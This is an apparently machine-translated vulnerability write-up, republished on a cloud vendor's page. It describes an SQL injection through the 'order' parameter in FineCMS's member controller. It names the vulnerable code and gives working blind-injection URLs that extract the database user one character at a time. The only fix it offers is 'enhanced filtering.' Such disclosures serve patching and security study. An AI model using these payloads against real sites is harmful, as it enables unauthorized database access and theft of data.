One Finecms code triggers Multiple SQL injections

Source: Internet
Author: User

One Finecms code triggers Multiple SQL injections

Location:


/Dayrui/core/D_Member_Home.php 81 rows:

$order = isset($_GET['order']) && strpos($_GET['order'], "undefined") !== 0 ? $this->input->get('order', TRUE) : 'updatetime desc';

The next 109 rows:


$ This-> link-> order_by ($ order );



First, the order is obtained from $ _ GET and directly placed into the order by statement, resulting in SQL injection.

Because multiple classes inherit this class, SQL injection causes multiple features to be shot, including various sub-functions of finecms.

 

For example, news.

First, modify/dayrui/core/D_Common.php line 304:


if ($this->member['adminid'] || IS_ADMIN || 1) {    $this->db->db_debug = $this->site[SITE_ID]->db_debug = TRUE;} else {    $this->db->db_debug = $this->site[SITE_ID]->db_debug = FALSE;}



After IS_ADMIN or 1, debug the database. At this time, access http: // xxxx/member/index. php? S = news & c = home & kw = & order = aaaa'

The following error is reported:

 



However, since no error is reported by default, what other injection methods are available besides Delayed Injection After order?

In AR of CI, once an error occurs in database statement execution, the result () or result_array () function following it throws a fatal error: Call to a member function result_array () on a non-object, php cannot continue execution. Therefore, even if error_reporting (0) or php is not enabled, we can determine whether the SQL statement is successfully executed by observing whether the page is fully executed.

Therefore, we were given a blind note condition: the error is different from the correct display page.



I have talked a lot about it. Let's use it directly:


Error: http: // xxx/member/index. php? S = news & c = home & kw = & order = (select 1 from information_schema.tables where ord (mid (user () from 1 for 1)> 113) Correct: http: // xxx/member/index. php? S = news & c = home & kw = & order = (select 1 from information_schema.tables where ord (mid (user () from 1 for 1)> 114)


The preceding method constructs an SQL statement with an error and returns an error using the number of results returned by the subquery. If the number of results returned by the Subquery is greater than 1, the "Subquery returns more than 1 row" error will pop up. Therefore, when ord ('R')> 113, the where statement is true and multiple results are returned by the select statement, resulting in an SQL statement error and a Fatal error in php. When ord ('R')> 114, the where statement is false. If 0 results are returned by the select statement, no error is returned.
 


 

 

Solution:

Enhanced Filtering

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.